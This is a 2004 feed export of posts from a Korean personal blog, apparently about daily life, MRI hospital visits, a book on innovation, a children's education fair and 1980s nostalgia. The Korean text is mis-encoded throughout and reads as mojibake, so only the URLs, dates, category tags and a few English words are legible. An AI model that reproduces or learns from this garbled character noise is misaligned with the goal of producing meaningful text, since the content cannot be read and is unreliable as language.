½ְֳַױ´ֿ´.

    - -

    ¢ׁ blogger jely ver 3

    ]]>
    -258@http://jely.pe.kr/ -monologue -2004-11-24T02:22:24+09:00 -
    - -¶ַ ¸ס¿¡ ´כַׁ ¾ך±ג -http://jely.pe.kr/archives/2004/11/20041117_000252.html -»ן¼÷÷´¿ר¿¡¼­´ֲ ¾אְ» °ט¼׃ְְ¸·־ ¸װְ¸¸י¼­(¾אְ÷ ¾ֶ¸¶µµ ֱרֵכֱ¦·־ »‎°¢µָ´) ¸סְ» ¸¹ְּ ¿עֱקְֱּצ ¾ְ¸¸ח ֱ¶½ֱֹ¶½ֹ »‎ָ°ַֿ¸י, ½ֳ°£ְּ ¾מ´ְֱ₪µµ ָו¸£¸י ְ¿¬ָק ³´´ֲ´´ֲ ֳ³¹זְ» ³»·ָ´.

    - -

    ±׳ ֳ³¹ז´כ·־ ֱצ³½ֱצ ¹ת½ב 20ְֿ ³²ֱ‏. ´«¿¡ ¶ח´ֲ ֲקµµ´ֲ ÷¸ְֱּצ ¾´ֲ´.

    - -

    ¾ֶ´ֲ ÷׀ְַ ¼ׂ°³·־ ¶ַ ´¸¥ ÷´¿ר¿¡ °¡°װ µֶ´. ¼­¿ן´כַ׀÷´¿ר ֵכֱץֵ¬¸®´׀ְּ¶ף´ֲ °קְּ´.
    -ֱצ³­ֱײ ֱֳרְ» ¹°ם ¾מֱ¦ ֳ¹¹רֲ° ִ¡·ב¸¦ ¹¾ׂ´. ִ¡·ב´ֲ ¸¶ֳכֱ¦¸¦ ¸ס¿¡ ֱקֱ¢ ֵץ¿©ַֿ¿© ֵכֱץְ» ¾א°£ ¾ר¾ײֱײ°ם, ±׳ ִָ¿¡ ְֿ´ ָ£ְµַ´ֱֲצ¸¦ ֱצִׁ÷¸´ֲ ¹ז¹‎ְּ´.

    - -

    ֱצִׁ÷» ִָ¿¡ ½±°װ ָ£ְµֹ ±ג¹ּ°¡ ÷¸ְֱּצ ¾ְ¸¸י ֱײ»ח·־ µנ½÷ֵ© ¾׳ְ» »ּ¾ֶ³»´ֲ ¹ז¹‎ְ¸·־ ½ֳ¼תְ» ַ״¾ַׁ´. ַׁ ½ֳ°£ ֱ₪µµ °ֹ¸®´ֲ ְּ ½ֳ¼תְ÷ °¡°ְּ ֱ» ½״´. -_-

    - -

    ¾מֲ·µח ¾מֱ¦ ¸¶ֳכֱײ»ח¸¦ ¸ס¿¡ ¸ֲ¾ׂ´. ¸¶ֳכֱ¦¿ֽ ½÷ֵ׳·־ְּµו ¼÷÷׀ְּ µי¾מ°¡ ְײ´°ם ַׁ´.
    -½÷ֵ׳·־ְּµו? ¿ֳ¸²ַָ¶§ ְֱײ µמְוַֿ´ֲ ´¾מ ¾ֶ´ׁ°¡!!! ¿ֳ¸²ַָ ֳגְַֿ±ה ´ ֶ²·ָ±÷.

    ]]>
    ַֿ·ח°¡ ֱצ³­ ¿ְ´ֳ ֵכֱץְּ ¸¹ְּ ֱ¾ת´.
    -÷־¸נ´װµµ °°ְ÷ ְַ°ְּ½ֳ°ם, ³×µµ ¼צ¼תְ÷ ַַַֿ°ם ½ֽ´. ¾ֶ¹«¸® 0.5cm ֱ₪µµְַ ָהֵֽ¸¸ ³²´ֲ´°ם ַ״µµ ¸צ¿¡ ִ®ְ» ´ם´´ֲ °ֽ ְֳ¼°¡ ²¨¸²ֱקַֿ´. °װ´°¡ µ·ְּ ³¹« ¸¹ְּ µח´. -_-;

    - -

    ´ַאָק ֵכֱץְּ ֱ» ֱ¾תְ¸´ֿ ±¿הְֿ¿¡ ÷´¿ר¿¡ °¡¸י ´¸¥ ֳ³¹זְּ ְײְ» °ֽ °°´.

    - -


    -¸סְּ ֳ³ְ½ ¾ֱֶַ±ג ½ְֳַׂ ¶§´ֲ »‎ָ°ַֿ´ֲµ¥ ¹«ֱצ ÷ֶׂםַ´.

    - -

    ְְַ¿¡ ¾ֹ¾ֶ ְײ¾מµµ ¾ֱֶַ°ם, ¼­ְײ¾מµµ ¾ֱֶַ°ם, °¡ְו °םֵכ½÷·¯¿מ °ְֽ÷ ´©¿צְײ¾מµµ ¾ֱֶַ´´ֲ °ְּֽ´. °¡ְו ֶםַׁ ְ¼¼ְ־ ´©¿צ¼­µµ ¾ֱֶַ´ֿ ַֿ·ח¸¦ ÷¸³»´ֲ °ֽ ְֳ¼°¡ ½÷ֶ®·¹½÷¿´´.

    - -

    ½ֳ°£ְּ ֱ¶± ָו¸£°ם ¸צְ» ¾מ¶»°װ ַֿ¸י ´ת¾ֱֲֶַצ ±ת´°װ µֶ´. ¾א°£ ְּ»ףַׁ ְ¼¼ְּ±ה ֱַֿצ¸¸ ±׳·± ְ¼¼·־ ֵכֱץְ» ְּ±ג°ם´ֲ ַ´.

    - -

    ֱַֿצ¸¸ ±׳·± ³כ·ֲ¿¡µµ ֵכֱץְ÷ °¡¶ף¾ֱֹצ ¾ְ÷ ֳ₪·־ ½ֳ°£ְּ ²ֿ ָך·¶´. ְֱּ¦´ֲ ¸ס ¾ָ¾ֳֶַ ¶§ְַ ±ג¾ןְּ °¡¹°°¡¹°ַֿ´. ¸ס ¾ֲֶַ °ְּֽ »‎ָ°ְּ µֶ´. ¾ֲֶַ°װ ְֽ¼קַ״ֱצ´ֲ °זַטְ÷ ¹«ֱצ ½ֵ÷ס·׃´. ¸ֱ°¢. ±ג¾ן»ף½ֱַץ°ת ÷ס½ֱַׁ ַצ»ףְֿ±מ?

    - -

    ֳ³ְ½ ¸¹ְּ ¾ֳֶַ ¶§´ֲ ¾מ´ְֱ₪µµ ¾ֶֶֽ´ֱֲצ, ¾מֱ¦´ֲ ¿ְ´ֳ÷¸´ ¾ף¸¶³× ´ץ ¾ֶֶֽ´ֱֲצ °¡¸§ַֿ±ג ָµי¾מ ֱר´. ±׳³ֹ ¾ֲֶַ »ףְֲֵּ°ם, ±׳°װ »‎ָ°ְּ µָ´.

    - -

    ´©°¡ ¸ס ¾ך±ג¸¦ ¹¯ֱצ ¾´ֲ ְּ»ף ³× ֱ¶ֲקµµ ¾ֲֶַ °ְֽ» ¸ֱ°¢ַֿ°װ µָ´. ¸סְ÷ ְ ¿עֱקְֱּצ ¾ְ¸¸י¼­ »»»»ַֿ°װ ¼¼¿ל°ם ְײְ¸¸י¼­µµ ¸»ְּ´.

    - -


    -ֱַֿצ¸¸ ¿ְ´ְֳ÷ ֱצ³­ ½ֳ°£÷¸´´ֲ ָ®½ַָק ´ת ¾ֱֶַ´. ֱײ»חְַ ָ¿°ת°¡ ְײ±ה ְײ¾ת³×÷־´.

    - -

    ±׳°ַ ±׳·¸´ ִ¡°ם, ְֱּ¦´ֲ »¡¸® ³×ְ» »‎°¢µµ ¾ר´. ¾מֲקַַ ¹«½¼ ִ¡·ב¸¦ ַֿ´ר ¿ְ·¡ °ֹ¸± °ְּֽ¶ף´ֲ °ְֽ» ¾ֻ±ג ¶§¹®¿¡ ¿©ְ¯·׃°װ ֳµֳµָק ±ג´·ֱ÷¼ »‎°¢ְּ´.

    - -

    ´½ֳ ַׁ¹ר °ב½ֱַֹֿצ¸¸ ¸ס¸¸ ¾ָ¾ֱֶַ¸י ¿­½ָֹק »ל¸®¶ף. ֱצ± »‎°¢ְ¸·־´ֲ ¹¹µח ´ ַׂ °ֽ °°´.

    - -

    »ץ÷® 6½ֳ ±ג»ףַֿ¿© ¾א°£ְַ ¿ה°¡ ִָ ¾ִֶ§ְ» ֳ¬°¸װ°ם ָ¸»ח·־. ֳג± ֱצֳַֿ¶¿¡¼­´ֲ µ¶¼­. ַׁ ½ֳ°£ ֱ₪µµ ְֲֿן µµֲרַׁ ָ¸»ח¿¡¼­´ֲ ַֿ·ח ְֿ°ת¸¦ ְ§ַׁ ֱ״÷ס¿ֽ °טָ¹.

    - -

    ¿ה°¡°¡ °¡ְו ֱֱ´°ם ¹°¸®ִ¡·ב»ח°¡ ֳֳµַ״ֱב´. °¡÷­¿מ °ְֽ» µו´ֲ ֱ₪µµְַ ַן½÷µµ ±ַַ״ֱײ±ג´ֲ ֱַצ¸¸ ¿ה°¡°¡ °¡ְו ֱֱ´°ם ַׁ´. ֱ¶±¸¸ ¸ס ¿עֱקְ׃ְּ °¡÷­¿צֱצ¸י ¿ה°¡¸¦ ¹ט¿ן ¿¹ֱ₪ְּ´.

    - -

    ²ֿ ÷ס½ׁ °ֽ °°´רµ¥... ±׳·¡µµ ¹«ֱ¶°ַ ַׂ°ֵ´. ´½ֵ ְּ·¸°װ ¾ֱֶַ°ם ½ֱֽצ ¾´.

    - -

    ¿ה°¡¸¦ ¹ט¿מ´¸י ¿ְְ¿¡ ַֿ°ם ½ֽ´. ¿ְְ½ֳ°£ְ» ³¶÷ס¾רְּ ¾ֲֻק°װ »ח¿כַֿ°ם ½ְֽ÷ ¸¶ְ½ְּ ±¼¶ׂ°°´. ֱצ± ¿ְְ¿¡ ֵכֱץְּ °¡ְו ֵ©±ג ¶§¹®¿¡ ´ץ ±׳·± »‎°¢ְּ ³×³×÷־´.

    - -

    ¾ִֶ§¿¡ ְֿ¾מ³×¼­ ֳג±ַֿ´ֲ ½ֳ°£ µ¿¾ְָּ °¡ְו ¾ֱֶַ´ֿ, ¾ִֶ§¿¡ ֱ‎¿¡¼­ ¸יµµַֿ´ֲ °ֽµµ ֶק±ג, ְּ´´ֲ °ֽµµ ֶק±ג, ´כֳז ¾ף±¼¿¡ ¹°¸¸ ¹¯ָק°ם ֱ‎ְ» ³×¼±´.

    - -

    7ָ£¼±¿¡ ¾ֹ¾ֶ¼­ ֳ¥ְ» ²¨³ֲ´°¡ ְ׀±ג ֶק±ג. ֳײ´כַׁ ¸סְ» ¿עֱקְֱּצ ¾´ֲ ְ¼¼¸¦ ְ¯ֱצַֿ¸ח ¾ֹ¾ֶ ְײ´°¡ ֲק¶ף¸® ְבְ» ְ¹צ¸°´.

    - -


    -ֱײְת¸® ֱײְת¸® ¸»µµ ֲ ¸¹´. ¸ס ¾ֲֶַ ¾ך±ג·־ ´כֳ¼ ¾ף¸¶³× ´ץ ְּ ֶק½÷ֶ®¸¦ ֳ₪¿ן »‎°¢ְ־°¡. »ח½ַ ְּ ֶק½÷ֶ®´ֲ ´¸¥ »ח¶קְ÷ ֱצ°¿צ¼­ ְ׀´°¡ ¸»±ג¸¦ ¹¶ץ´. ֲֶָ¸°´.

    - -

    ְּ·± ֶק½÷ְֳֶ» ַ״÷»ֱצµµ ¿ְ·¡µֶ±÷. ֱײְת¸®ֱײְת¸® ֱײְ‎´כ´ֲ...

    ]]>
    -252@http://jely.pe.kr/ -monologue -2004-11-17T23:12:44+09:00 -
    - -MRI ֳװ¿µ ַ¸§ -http://jely.pe.kr/archives/2004/11/20041112_000251.html -

    ְ¼¼ָק ÷¸¸י ֶ¢¾מ³×¿ֲ µנ½÷ֵ©°¡ ÷¸¿©¿ה~
    ¿ְ´ֳ ³» MRI »חֱרְ» CD¿¡ ´ד¾ֶ¿װ´.
    -¸מ ½¸¸¿רְּ³× ֱײ°ם ֳװ¿µְ» ַ°ֽ¸¸ ´ד¾ֶ¿ְ´ֲ °ֽµµ µ·ְ» ³»¾ ַֿ´´ֿ. ¸¸ 2ֳµ¿רְּ³× ³»°ם »ח¿װ´.
    - -

    ֲק±ֲק± »לֶל÷¸´ֿ ¾מµנ¿¡ ¹®ֱ¦°¡ ְײ´ֱֲצ ´ ÷¸ְ־´. ±׳·¡¼­ ÷ס½ׁ µ· ֱײ°ם ´ ֲן´ֲ °ֵ°ֱצ.

    - -

    ³»ְְֿ÷ ´¸¥ ÷´¿רְ¸·־ ֱרְֲ» ¹ְ¸·¯ °£´. »ץ·־¿מ ¹ז¹‎ְ¸·־ ִ¡·ב¸¦ ַֿ´ֲ °קְּ¶ף°ם ַׁ´. ¸סµנ½÷ֵ© ְ¹® µ¿ֵכֵ¬¸®´׀ְּ·¡³× ¸׃·¡³×. ¾מ¶² ִ¡·בְ־ֱצ´ֲ ³»ְֿ °¡÷¸¸י ¾ֻ°ֱצ.

    - -

    ֱײְ§¿¡ ¸ס¿¡ ֵכֱץְ» ָ£¼ַֿׂ´ֲ ָ¯ְµיְּ ´ֳ°ם ְײ´. ָ₪½ֳ ³×ְַ ¸סµנ½÷ֵ©°¡ ½ֱֵ¾ְ¸·־ ְ¿°¼÷ְ» °¡ֱר°װ ¾ֶ´ׂ±מ? ¾מֲ·µח ֱײְ§ְַ ¸ס ¾ֲֶַ »ח¶קµי¿¡°װ ¿­½ָֹק ֱ¶¾נ ַ״ֱײ°ם ְײ´. ַׁ 1³גֲכ ¾־¾ׂ´ץ´ֿ ְַ»ח ´ µֶ´.

    - -

    ³¾÷־ֵֽ ¹´ֲ ִ¡·ב·־ ֱ» ³×¾ֱֶצ¸י ְֱֱ¸·ֳ¸¸...

    ]]>
    -251@http://jely.pe.kr/ -monologue -2004-11-12T00:52:21+09:00 -
    - -ְ¯ִטַׁ ְּ³כ÷£ְּ¼ַ -http://jely.pe.kr/archives/2004/11/20041112_000250.html -ֵ¸ָ­¼צ÷׀(צג£בפֿ)ְ» ְ§ַׁ ְֿ°צ°¡ֱצ ָשֶ® - -
    1. ְגֱצ¸¦ ֱ₪±ג ±¸µ¶ַֿ°ם ְ¥¼­ַ־ְ» ֱס±ה´
    2. -
    3. °¨µ¶ ¿×ְַׂ» ¸ֳ´ֲ´
    4. -
    5. »ח¹«½ְַ» °³¹זַׁ´
    6. -
    7. ´כ÷¯ְ¸¦ °·ֱַׁ´
    8. -
    9. ¿÷־ְ־ְ» ֳ₪¿כַׁ´
    10. -
    11. ¿×ְַׂ» ¹²´
    12. -
    13. µ־ °¡ֱצ ְּ»ףְַ ְ¾ק¿¡ ±³ֲק ֶָ·ֳ½ֳֵ²´
    ֱ¶³´ר ¸®ֶ®¸ַ,ֵט ִּ¸®, ¡÷ְ¯ִטַׁ ְּ³כ÷£ְּ¼ַ¡»(¼¼ֱ¾¼­ְ, 2002), 217p
    - -

    ¾ף¸¶ ְ "ְ¥±גָ¹ְ°¡ ¾ֻ¾ֶ¾ַֿ´ֲ ְ¥µנְְ־ ֳ¼ֵ©¸®½÷ֶ®"¶ף´ֲ ֱִֶ·±½÷¿¡¼­ ֳֳµַׁ ֳ¥ְּ´. °­ְַ°¡ ½ג ¸¾¿¡ µי¾ת±ג¿¡ ´ְ½³¯ ¹·־ ֱײ¹®ְ» ַ״¼­ ְ׀±ג ½ְֳַ´.

    - -

    ְ¯ִטַׁ ְּ³כ÷£ְּ¼ְַ÷ IDEOְַ ָ«÷¸ ֳ¥ְְְּ ±׳µיְַ ְּ³כ÷£ְּ¼ַ ¸¶ְ־µו¸¦ ְ¶ַֿ´ֲ ֳ¥ְּ¶ף°ם ַׂ ¼צ ְײ´. ְּ³כ÷£ְּ¼ְַַ ֱ¿ה¼÷ְ» ֱײ¸סַֿ°ם ¼÷°ר »ח·¸¦ ְ׀ְ» ¼צ´ֲ ְײ¾תֱצ¸¸, ¹¾ֶµיְּ±ג¿¡´ֲ ³»¿כְּ ֱ» ¾אַׁ°ַ »ח½ְַּ´.

    - -

    ³¹« ¼¼÷־ְְ־ ³»¿כְּ°ֵ³× ³¹« ³׀ְ÷ ¹ְ§ְַ ¾ך±ג¸¦ ַ״ֱײ°ן ַׁ´. ±׳·¡¼­ ±ג´כ¿¡´ֲ ¾א°£ ¸ר¹ִּ£ °ֽ °°´. (÷ׂ÷¯ְַ ֱר¸® : ±ג´כ°¡ ֵ©¸י ½ַ¸ֱµµ ֵ©´!!!)

    - -

    ³×ְַ ÷׀¾¿¡¼­ְַ ְּ³כ÷£ְּ¼ְַ÷ ¹«¾שְ־°¡? ³×¿¡°װ ְּ³כ÷£ְּ¼ְַ÷ ¾מ¶² ¹ז½ְִ¸·־ ַ¿הַׁ°¡? ¶ף´ֲ ֱת¹®¿¡ ´כ´הַׂ ¼צ ְײ´¸י ְּ ֳ¥ְ» ֱ¦´כ·־ ¼ָׂ­½ֳֵ² °ְֵֽֿµ¥... ָל...

    ]]>
    -250@http://jely.pe.kr/ -lifelog -2004-11-12T00:35:39+09:00 -
    - -¹דֲ -http://jely.pe.kr/archives/2004/11/20041109_000247.html -

    ְּ¹ּ ְ‎¹ְּ³× ¸װְ÷ »ףֲֵ.
    ¸םµ¿¿¡¼­ ¶³ְּ·־ ִֶ´ֲ »§ְ» »ח¿װ´. ַ×ֱַׁ°װ 3,000¿רְּ´ץ±÷. - -

    ֱצ± ¹דְֲ¸·־ ¸װ°ם ְײ´. ½ג ¸ְְײֱצ´ֲ ¾ֱצ¸¸, ¾¹ד¿¡ ֳגֳגַװְ÷ ¿ֿ÷®ַֿ°װ ֳ₪¿צֱ״´.
    -¶³ְּ¸¦ ֶָ·ֱ°¡´ֲ °ְּֽ °בִ ½½ְְֲַֿ÷ ¾ֶ´ׁ °ֽ °°´. ³»ְְּֿ¸י ¹צ·ֱֱת °ֵ´ֿ±מ ±׳ ְ¿¡ ֶָ¸°´¸י ¸»ְּ´.
    -³×¸¦ ַ¿ה·־ ַֿ´ֲ °ק¿¡ ְײ´ֲ °ְֽ÷ ¹«ֳ´ ַא÷¹ַׁ ְְּֿ´. ¶³ְּ¶ףµµ ¸»ְּ´.
    -¿הֱע ¸צְּ ¾ִֶֶ¼­ ±׳·±ֱצ´ֲ ¸פ¶ףµµ ְ² ÷ׂ¾ַָֿ´. ¿­½ָֹק ³כ·ֲַ״¾ֱצ ¸¶ְ½ְ÷ ¸װֱצ¸¸, ְּ¹ּ ´ְ÷ °ְֽ÷ ¾ֶ´ֱׁצ, ³»°¡ ַ¿הַׁ °קְ־ֱצ ְ² °ֱֶ₪ְּ µָ´.

    - -

    ³»ְְֿ÷ ֱײְ§¸¦ ַׁ¹ר µׁ·¯÷¸°ם ÷־ֱת¾ר´ֲ »ף½ֲָ¿°ת¶ףµµ ´ְ²¸÷ֱ¾°´. ֱ¶±ְּ³×¸¶ ְָּ µֹ¶ף³×?

    ]]>
    -247@http://jely.pe.kr/ -monologue -2004-11-09T00:24:25+09:00 -
    - -¹¹÷־ֵֽ ַׂ±מ? -http://jely.pe.kr/archives/2004/11/20041108_000246.html -
  • ¸ְֵֿ ַֿ´ֲ ְְּֿ¶ף ַֿ·ח¶ףµµ ¼ָׂ¦ָק ַֿ¸י ֲףֲףַׁ ְֿ
  • -
  • ֱצ± ַֿ´ר°ֵ ´ַֿ°ם ַ״¾ֱצ ַֿ¸ח ¸חִ¥ µ¿¾ָ ½׳¿©¹צ¸° ְֿ
  • -
  • ½ֳ°£ְ÷ ֱ» °ֹ¸®°ֱצ¸¸ ½ְֳ¸¸ ַׁ´¸י ¹«ֱצ ֱס°ּ°װ ַׂ °ֽ °°ְ÷ ְֿ
  • -
  • ½ְָ÷ °ְֽ÷ ¾ֶ´ֱֿצ¸¸ ¾ַָֿ¸י ֱ¶± ¿ו¸װ´ֲ ְֿ
  • -¸ְֵֿ 1¹רְ÷ ¹µו½ֳ ַֿ°ם, 2¹רְ» ֱ¶± ַֿ´°¡ 3¹רְ» ½ְֳַֿ·ֱ°ם ַׂ ¶§ֲכ ַֿ·ח°¡ ´ ֱצ³­´. ±׳·¡¼­ 4¹ר ¶§¹®¿¡ ´«ִ¡¸¦ ÷¸¸ח ַֿ·ח¸¦ ¸¶¹«¸® ַׁ´. - -

    ¾מֱ¦±מֱצ´ֲ ¹¹÷־ֵֽ ַ״¾ַֿ¸ח, ¹«¾שְ» ֱַֿצ ¸»¾ֶ¾ֱַׂצ °ם¹־ַ´. ֱַֿצ¸¸ 4°¡ֱצ ¸נµ־ ³»°¡ ַׂ ְְּֿ¸ח, ´ ַׁ°¡ֱצ¶ףµµ ַ״³»ֱצ ¸רַֿ¸י ±׳¸¸ֵ­ְַ ´כ°¡°¡ ַ¿הַֿ´´ֲ °ְֽ» ¾ֻ¾ׂ´.

    - -

    ³× ¾רְּµµ ¼¼»ףְ÷ ¹«ֱצַֿ°װ ְ µ¹¾ֶ°£´. ±׳·¯ַׁ ֱר¸®¸¦ ¾ֻ·ֱֱײ±ג ְ§ַ״ ´ץ¿ם ³×¸¦ ¹׀¾מ³»·ֱ°ם ַֿ´ֲ °ֳֽ³·³ ÷¸ְ־´.

    - -

    ¸ְֵֿ 4°¡ֱצ ¸נµ־ ´ ַ״³»¾ ַׁ´. ±׳¸®°ם...
    -ְ½ֵ°¨ְ» ְֱׂצ ¸»°ֽ. ±׳·¸´°ם ¿ְ¸¸ַ״ֱצֱצµµ ¸»°ֽ.

    ]]>
    -246@http://jely.pe.kr/ -monologue -2004-11-08T23:25:06+09:00 -
    - -ְּ±·ח½÷ ¼­¿ן ±¹ֱ¦ ְ¯¾ֶ±³ְ°ְ ֲ°¡ -http://jely.pe.kr/archives/2004/11/20041105_000245.html -

    »חֱרֳגֳ³ : ¡¡Laygogo¡¡

    - -
    ֱ¦11ָ¸ ¼­¿ן ±¹ֱ¦ ְ¯¾ֶ ±³ְ°ְ (EDUCARE 2004)
    The 11th Seoul International Edu-Care Fair for Children 2004 -
    • ±ג°£ : 2004.11. 04(¸ס)- 11. 07(ְֿ)
    • -
    • 4ְֿ°£ ¸ְֵֿ 10:00-18:00(ְװְו¸¶°¨ 17:00)
    • -
    • ְו¼ׂ : COEX ÷»° 1ֳ‏ ֲֵֶע¾ח°
    - -

    ÷־½÷·־ ¿ְ½ֳ¸י PDF »ףַ°±ְַ» ¹ְ» ¼צ ְײ½ְ´ֿ´.
    -¶ַ!! ְּ±·ח½÷ »ץ·־¿מ rare Itemְ־ ְּ±·ח½÷ ½÷ֶ¼ִ¿µµ µו¸³´ֿ´.
    -ַֿ³×´ץ!! ְֿ¿הְֿ¿¡ ¿ְ½ֳ¸י jelyµµ ¸¸³×½ַ ¼צ ְײ½ְ´ֿ´. ^^;;; (ְּ±·ח½÷ ָ¸¿רְּ¶ף°ם ַֿ¸י ¹«ֱצ ִ£ֳַׁ´ ַ״µו¸³´ֿ´. -_-v

    ]]>
    -245@http://jely.pe.kr/ -around_Blog -2004-11-05T11:00:33+09:00 -
    - -¸׃¸®°¡ ֱצִ¡ֱצ ¾ְ÷ »ףֲֵ -http://jely.pe.kr/archives/2004/11/20041102_000244.html -¿ְְְ÷ 'ְּ¼÷ְַ ½ֳ°£´כ'ְּ°ם, ¿ְִָ´ֲ 'ֱ₪¼­ְַ ½ֳ°£´כ'¶ף°ם ַױ´ֿ´. -¾ִֶ§ְַ »ףִטַֿ°ם ¸¼ְ÷ ±ג÷׀ְ÷ ְּ¼÷ְְ־ ÷׀¾ְַ ְְֿ» ַֿ´ֲµ¥ ְַױַֿ°ם, ¿ְִָ³× ְת³ב ½ֳ°£´כְַ ±ג÷׀ְ÷ °¨ֱ₪ְְ־ ±³·ש¸¦ ַֿ´ֲµ¥ ְַױַֿ´´ֲ °ֱֵצ¿ה. (ִָ·«) - -

    ³×ְַ ַֿ·ח ¾ק¹« ½־ְֵּ¬ְ÷ »ף´חָק ¹÷°¡ ְ¸רµַ¾מ ְײ´ֲ µם. ³×µµ ֱ¾ֱ¾ ´ְ³¢°ן ַׁ´. ÷׀¸םָק °³¼±ַׂ ַ¿ה°¡ ְײְ»µם.

    - -

    ¹ד¿¡´ֲ ְּ·± ְת·± ְג »‎°¢ְּ ¶°¿ְ¸£¸ח ַׁ¾רְּ °¨ֱ₪ְְ־ »ףֲֵ·־ ÷ֱ®µח´´ֲ °ְֽ÷ ְּ¹ּ ¾ֻ°ם ְײ¾ת´. ַֿ±ה ¿הֱע¿£ ְּ·± °זַטµµ ÷°·־ ¾ר´. ¿ְְְּµח ¿ְִָµח ַצ½ַ¿¡ ִ¡¿© »ל°ן ַׁ´.

    ]]>
    -244@http://jely.pe.kr/ -socialization -2004-11-02T12:03:08+09:00 -
    - -±¸»צ¸ֲֳ±ג -http://jely.pe.kr/archives/2004/10/20041028_000243.html -¢ׁ 1ְ־ ְ¥ ¸ֵ°ֱֵר ½־ְּ¿שµו ֶהְֶּ, '½ֲ½ְֲו±¸'

    - -

    ±׳·¸´±¸? ±׳·³ ±¸µ¶ְ» ֱ» ַ״÷¼±מ³×?
    -ְּ¿ױְּ¸י °ר½ִ ֶהְֶּµי·־ ±¸µ¶ְ» ַ״¾°ֱצ? RSS ֱײ¼ׂ¸¦ ÷¹»חַ״¼­ Sharp Reader¿¡ ÷¿©÷¸´ֿ.

    - -

    ¿ײ ¸®½÷ֶ®°¡ ַֿ³×ְ־°ֵ¾? RSS´ֲ ±¸»צ¸ֲֳ±ג¿´¾מ? ±׳·¡µµ µ‏¶ ֶק½÷ֶ® ַׁ °³´ֲ ³¹«ְַֿ¾ֶ.

    ]]>
    -243@http://jely.pe.kr/ -around_Blog -2004-10-28T14:22:16+09:00 -
    - -³¶¸¸ִ¼­ֶ® -http://jely.pe.kr/archives/2004/10/20041023_000239.html -ֵה¿הְֿ ¾ִֶ§. 7,80³ג´כ ³¶¸¸ְ» µי·ֱֱײ´ֲ ³¶¸¸ִ¼­ֶ®.

    - -

    '»ח¶ְַ ´כָ­', '¿©¸§³¯ְַ ֳ¾ן', 'ֳ¹ ´«ְּ ¿ֲ´±¸¿ה' µמְַ ³כ·¡·־ 80³ג´כ ֳ¹ ¿ְ·£ ְ־±ג¸¦ ´©·ָ´ר ְֱּ₪¼®ְּ ÷־¸¥ '»ח¶ַֿ±ג¿¡'´ֲ ¿¹ְְַ ´ְ³¦°ת ´¶ף¼­ ¾ֶ½¬¿עְּ ְײ¾ת´. ³­ ¾ֱֶק ½÷ֵ¸ִ«ֵה(starccato)¸¦ ±ג¾ןַֿ°ם ְײ´ֲµ¥...

    - -

    ¿ֱ½¼80ְַ '÷ׂ³מְּ¾'´ֲ ´כ´ַׁ ¸ם°מְּ´. ֱצ±µי¾מµµ ¿ֲ¸צְּ ֲ¥¸´ַֿ´.
    -ָ«¼­¹ְַ ´¸¥ ¸נ½ְְ» ÷¸¸ח ¹«ֳ´ ³מ¶ף¿´. BOLL¿¡¼­ ±׳ְַ ֶקֱצ¼ְַ÷ ¸®µו±גֵ¸°ג ÷¸ְֳִּ´.

    - -

    ½ֳֳ»·ְּ ְְ÷ ½ֳ°£´כ¿¡ ֶם¼÷µָ 7080¼¼´כְַ ֳ¾ןְ» ´דְ÷ ³¶¸¸ִ¼­ֶ®´ֲ ֵ¸ְ׃¸׃½ְֵ» ֵ¸°ם ±׳ ¶§·־ µ¹¾ֶ°£ °ֽ °°ְ÷, ³×¿¡°װ ±ג÷׀ ְֱֱ÷ ¿©ְ¯¸¦ ֱב´. °¡¿ה¹«´כ¸¦ ÷¸´ֲ ¾מ¸£½ֵµיְַ ±ג÷׀ְּ ¹·־ ְּ·± °ֵ°ֱצ.

    - -

    p.s. BOLLְ÷ 80³ג´כ ֳ¹¿¡ ָ°¹ַׁ ָ°µ¿ְ» ַ´ר ±׳·ל»ח¿מµו ¡®÷ם·¢ֵ׳ֶ®¶ף¡¯, ¡®¿ֱ½¼80¡¯, ¡®¶ףְּ³½÷¡¯, ¡®·־ִ¿½÷ֶ®¡¯ְַ ֳג½ֵ 8¸םְּ ¸נ¿© 98³ג¿¡ »ץ·׃°װ °ב¼÷ַׁ ֱ³ג ±׳·ל»ח¿מµוְּ´.

    ]]>
    -239@http://jely.pe.kr/ -socialization -2004-10-23T12:31:02+09:00 -
    - -±ְµµ¿ֽ MRI -http://jely.pe.kr/archives/2004/10/20041021_000238.html -¿ְִָ2½ֳ30÷׀ ±ְµµ °ֻ»ח. °¡° 2¸¸ 9ֳµ¿ר. ¾ֶ¸¶µµ ÷¸ַטֳ³¸® µַ´ֲµם.

    - -

    ֶָ ¸¶µנְַ ½ֵ°זְ» ְ±״ַֿ¿© ±׳ ַֿ´ְַ ±ְ°ְּ ְ ¿עֱקְּ´ֱֲצ ָ®ְ־ַֿ´ֲ°ֵ ¸ױְת ַ´. ְ ¿עֱקְ־´. ¿©±ג±מֱצ°¡ ±ְµµ °ֻ»חְ־ֱצ ±׳´ְ½¿¡ ַׁ°ֵ ±מֱצְ־ֱצ ְ ¸נ¸£°´.

    - -

    ´ְ½ְ÷ ¸ס µֲ¿¡´ ¹«½¼ ¹´ְֳ» ֲס·¯ ³ײ°ם ֲֹ±¾¿ ¿עֱק¿© ÷¸°ם´ֲ °ֻ»חְּ´. »‎°¢÷¸´ ¾ֱֱֶַצ ¾¾ֶ¼­ ֱ¶¿כָק ְײ´ֲµ¥, ³»°¡ ¾ֱֲֶַ ¸פ¶ת´´. ¾ֱֶַ¸י ¸»ְ» ַֿ¶ף°ם ַֿ´ֲ±÷. ֱרְ ¾ֱֶַ´°ם ַׂ²¬.

    - -

    4,5¹רְַ ½ֵ°זְּ ´­¸®°ם ְײְ»°ֵ¶ף´ֲ ¿¹»ףְ÷ ±׳ ¸»ְ» ³»¹סְ÷ ְַ»ח¿¡ ְַַ״ ֶ²·ְָ½ְּ ֱץ¸םµַ¾ת°ם, ֱ¶± ¾ֶ·¡ְ־ 7¹ר»ְ°¡ ½ֵ°זְ» ´©¸£°ם ְײ´ֲ ³א¼®ְ׃ְ» ָ®ְ־ַ´. 1³גְ ָ¸»ח ±ֳ³ְַ ÷´¿ר¿¡¼­´ֲ 2,3¹ר »ְ »חְּ¶ף°ם ַ¾ת´. -_-;;;

    - -

    7¹ר»ְ°¡ ¾מµנ ÷¾מְײ´ֲ ³א¼®ְ־ֱצ ֳ£¾ֶ÷¸ְ.
    -

    ]]>
